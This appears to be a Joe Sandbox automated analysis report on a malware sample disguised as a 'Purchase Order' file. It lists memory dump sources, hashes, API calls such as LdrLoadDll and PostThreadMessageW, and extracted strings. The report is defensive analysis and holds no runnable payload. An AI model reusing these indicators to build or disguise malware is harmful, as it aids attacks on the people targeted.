                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 76c312a0115ec1df72758ab166ccdd9c2a26fd0aad0c3be3248e00e9da044010
                                                            • Instruction ID: 07696f74c25119933b49c4d8e17055cef73305f0b6277dbd61726c3910bda809
                                                            • Opcode Fuzzy Hash: 76c312a0115ec1df72758ab166ccdd9c2a26fd0aad0c3be3248e00e9da044010
                                                            • Instruction Fuzzy Hash: A15135B091130A8FEB54DFA9D948BEEBBF5FB88314F208459E409A7390DB346944CB65

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0166D3D6
                                                            • GetCurrentThread.KERNEL32 ref: 0166D413
                                                            • GetCurrentProcess.KERNEL32 ref: 0166D450
                                                            • GetCurrentThreadId.KERNEL32 ref: 0166D4A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 1d82e3875fa1b676576ed433b1f82084f904f72fa88a6662c10b7f840ac2a0c9
                                                            • Instruction ID: 49d75164781f188307cecba73ed58a927a1a6be53744a4a8be63085f570ec703
                                                            • Opcode Fuzzy Hash: 1d82e3875fa1b676576ed433b1f82084f904f72fa88a6662c10b7f840ac2a0c9
                                                            • Instruction Fuzzy Hash: 7F5135B09113098FEB54DFAAD948BDEBBF5FB88314F208459E409A7390DB346944CF65

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0166B326
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: eb20d9c4e1b602c78e5be67f71b33b740b79e2a7eca14df7612798ce58aad4d2
                                                            • Instruction ID: ce7d5825d9ba106c06d6528394c9bf34e6b03bf369d5afe37aaed5c4c4a5c841
                                                            • Opcode Fuzzy Hash: eb20d9c4e1b602c78e5be67f71b33b740b79e2a7eca14df7612798ce58aad4d2
                                                            • Instruction Fuzzy Hash: FD711370A00B05DFDB24DF69D94476ABBF9BF88200F00892ED44ADBB40D774E945CB91

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 016659A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: ca73abe701129f73bf14966424f8af0bb0b02f6bef337dcfc37d72c168f42a3f
                                                            • Instruction ID: 8de1f704595498233d8e716a20006ae89c5c8d7c0ed40d7e67fce57a2d34e407
                                                            • Opcode Fuzzy Hash: ca73abe701129f73bf14966424f8af0bb0b02f6bef337dcfc37d72c168f42a3f
                                                            • Instruction Fuzzy Hash: F641E170C0071DCFDB24DFAAC885B9EBBB5BF89704F20816AD409AB251DB716945CF90

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 016659A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 5da9ab5e506f77ec700cf04168dd2c86a3d6022d32626ca596819ed13ae31021
                                                            • Instruction ID: 0491f2a8e12c0d00afe49f10431dd90f34d6b32352b08d4792d8805d78302d78
                                                            • Opcode Fuzzy Hash: 5da9ab5e506f77ec700cf04168dd2c86a3d6022d32626ca596819ed13ae31021
                                                            • Instruction Fuzzy Hash: 8141FFB1C0071ACBDB24DFA9C885BCEBBB5BF89704F20815AD409AB250DB716945CF50

                                                            Control-flow Graph

                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0166D627
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 2c8ac23d142c5fc748b4efd717f4de45a8429c906d003659376f1500d978e86e
                                                            • Instruction ID: f36b0c9b818bb053be4632fa3f74e06560d0eabdc9bf8a1a90c4e68a8032b7d7
                                                            • Opcode Fuzzy Hash: 2c8ac23d142c5fc748b4efd717f4de45a8429c906d003659376f1500d978e86e
                                                            • Instruction Fuzzy Hash: BF21E4B59002199FDB10CFAAD884ADEBBF9FB48310F14801AE958A3350D374A940CF64

                                                            Control-flow Graph

                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0166D627
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: f3b15c999180dd4308c1ce2314fa76983c778f81fc9247400756c718946d6f54
                                                            • Instruction ID: d9c3dffc7d009f10e40be3d0aa372fb7791bba78d13505739c290db39e1af549
                                                            • Opcode Fuzzy Hash: f3b15c999180dd4308c1ce2314fa76983c778f81fc9247400756c718946d6f54
                                                            • Instruction Fuzzy Hash: BC21E5B59003599FDB10CFAAD984AEEBBF9FB48310F14841AE958A3350D3789940CF60

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0166B326
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 8dd9c4e09c1ef7a98dd8438848eb9687591631e4bba22ef632c96e6de7503d1a
                                                            • Instruction ID: d7170acdec6fb61b567b1d3df6a5fc2cf4a9d78a5def72e71fdbfcb55c26f98a
                                                            • Opcode Fuzzy Hash: 8dd9c4e09c1ef7a98dd8438848eb9687591631e4bba22ef632c96e6de7503d1a
                                                            • Instruction Fuzzy Hash: B811FDB69003498BDB10DF9AC844A9EFBF8AB88220F10841AD918B7610C379A545CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction ID: 31d4ed47d63ff913762fea95a3ccf117f774ce8a3e7d901dde05de70afc4c67d
                                                            • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction Fuzzy Hash: D911CD76544240CFDB02DF44D5C4B5ABF72FB84224F2482A9D8090A657C37AE456CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4a95e316b91f27f98016788dc975c6911c24d51566bc2ee67837a508802313d
                                                            • Instruction ID: 929630a399040829341265b38d3a0ded911eeb72c597815af7ef0ddd1fa98f9a
                                                            • Opcode Fuzzy Hash: b4a95e316b91f27f98016788dc975c6911c24d51566bc2ee67837a508802313d
                                                            • Instruction Fuzzy Hash: E301F7710443849BE7146A65CCC0B6EBFE8FF81625F54C41AED084FA82C3389840C7B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 494bc0deb3550c9aff584e497fe7b48a548745e9b7d66b0776c787770550e75e
                                                            • Instruction ID: 22a562e2435f8c31ca73350fe9bcfca94f7931000e1a31fce48c3b735bc7f0df
                                                            • Opcode Fuzzy Hash: 494bc0deb3550c9aff584e497fe7b48a548745e9b7d66b0776c787770550e75e
                                                            • Instruction Fuzzy Hash: C3F0C2320043849EE7149A19C884B6AFFE8EB81734F28C45AED084F682C278A840CBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5375db2cad5b06ed6ec170b671010027ca4551422de3e2f33239053adbc49b6
                                                            • Instruction ID: ec864a2d127cb488ce053c1182ad40873acc39a6651c6164651766ad7ae5bd57
                                                            • Opcode Fuzzy Hash: e5375db2cad5b06ed6ec170b671010027ca4551422de3e2f33239053adbc49b6
                                                            • Instruction Fuzzy Hash: 0AA17F32F002168FCF15DFB9DC5059EBBB6FF84300B1545AAE905AB265DB71E915CB80

                                                            Execution Graph

                                                            Execution Coverage:1.3%
                                                            Dynamic/Decrypted Code Coverage:5.1%
                                                            Signature Coverage:8%
                                                            Total number of Nodes:138
                                                            Total number of Limit Nodes:8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                            • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                            • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                            APIs
                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction ID: 55d98cbac179b72a764dd86cd5ec1f11a461976065f381c4f300eafe1b6f3ecb
                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction Fuzzy Hash: E8E086326402147BD210FB6ADC41FD7776CDFC5714F00451AFA1867242C6757A1587F5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 390 18a2b60-18a2b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ac4491c87aeb6f8064f7327b81f317d5a38c56fee2231f9be21d3b0f38627fbb
                                                            • Instruction ID: 3b85241cecb80621df7b3796b99abaca6bc6a484eea2c756a01cfa445492cfea
                                                            • Opcode Fuzzy Hash: ac4491c87aeb6f8064f7327b81f317d5a38c56fee2231f9be21d3b0f38627fbb
                                                            • Instruction Fuzzy Hash: FF90026120240007410571584854656400E97E1301B55D021E20195A0DC5258A996626
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b4df249603d58f4c736b87e5000de2278b833fa1d8f8864bbb239cf8b2ea3a37
                                                            • Instruction ID: 89399dd77b01d1a2ed3287ca3b68f0d41036dc7a837a45b958329c49afcd58ca
                                                            • Opcode Fuzzy Hash: b4df249603d58f4c736b87e5000de2278b833fa1d8f8864bbb239cf8b2ea3a37
                                                            • Instruction Fuzzy Hash: 8A90023120140417D11171584944747000D97D1341F95D412A1429568DD6568B5AA622

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 391 18a2c70-18a2c7c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b291961c31e23fb53547dce9cadc69a4776644cc0a59da690217e939024793f6
                                                            • Instruction ID: 4e8744d45e29dc7718866da75bbb5a539dced16293bf287aebbfc5625fab11f2
                                                            • Opcode Fuzzy Hash: b291961c31e23fb53547dce9cadc69a4776644cc0a59da690217e939024793f6
                                                            • Instruction Fuzzy Hash: 6290023120148806D1107158884478A000997D1301F59D411A5429668DC6958A997622
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 809a2e628f88572af1226956f202b1efcaa5c2d9b4f759fe49f19a96f65bfdfa
                                                            • Instruction ID: 524aa147dd48ff081a0707201e509533c43b346d61abf177f1a5ea88d7d72532
                                                            • Opcode Fuzzy Hash: 809a2e628f88572af1226956f202b1efcaa5c2d9b4f759fe49f19a96f65bfdfa
                                                            • Instruction Fuzzy Hash: 8690023160550406D10071584954746100997D1301F65D411A1429578DC7958B596AA3

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: S$l420377x$l420377x
                                                            • API String ID: 1836367815-2727433438
                                                            • Opcode ID: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                            • Instruction ID: c2806ac613a218a9f43bc075071cdee210e11ad5ac0fb3b5002561ad8e7d22f2
                                                            • Opcode Fuzzy Hash: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                            • Instruction Fuzzy Hash: 43114C71D0015C7AEB10AAE69C81DEF7B7CDF4579CF448069FA0467141D27C8E064BB5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                            APIs
                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: l420377x$l420377x
                                                            • API String ID: 1836367815-444879537
                                                            • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                            • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                            • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                            • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                            APIs
                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: l420377x$l420377x
                                                            • API String ID: 1836367815-444879537
                                                            • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                            • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                            • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                            • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: wdA
                                                            • API String ID: 3298025750-2931128418
                                                            • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                            • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                            • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                            • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:

                                                            Control-flow Graph

                                                            control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:

                                                            Control-flow Graph

                                                            control_flow_graph 386 18a2c0a-18a2c0f 387 18a2c1f-18a2c26 LdrInitializeThunk 386->387 388 18a2c11-18a2c18 386->388
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 018D5543
                                                            • Invalid debug info address of this critical section, xrefs: 018D54B6
                                                            • double initialized or corrupted critical section, xrefs: 018D5508
                                                            • corrupted critical section, xrefs: 018D54C2
                                                            • 8, xrefs: 018D52E3
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D54CE
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D54E2
                                                            • Thread identifier, xrefs: 018D553A
                                                            • Critical section address, xrefs: 018D5425, 018D54BC, 018D5534
                                                            • Critical section debug info address, xrefs: 018D541F, 018D552E
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D540A, 018D5496, 018D5519
                                                            • undeleted critical section in freed memory, xrefs: 018D542B
                                                            • Critical section address., xrefs: 018D5502
                                                            • Address of the debug info found in the active list., xrefs: 018D54AE, 018D54FA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            Strings
                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 018D261F
                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018D2412
                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018D2602
                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018D25EB
                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018D2506
                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018D2624
                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018D2498
                                                            • @, xrefs: 018D259B
                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018D2409
                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018D22E4
                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018D24C0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
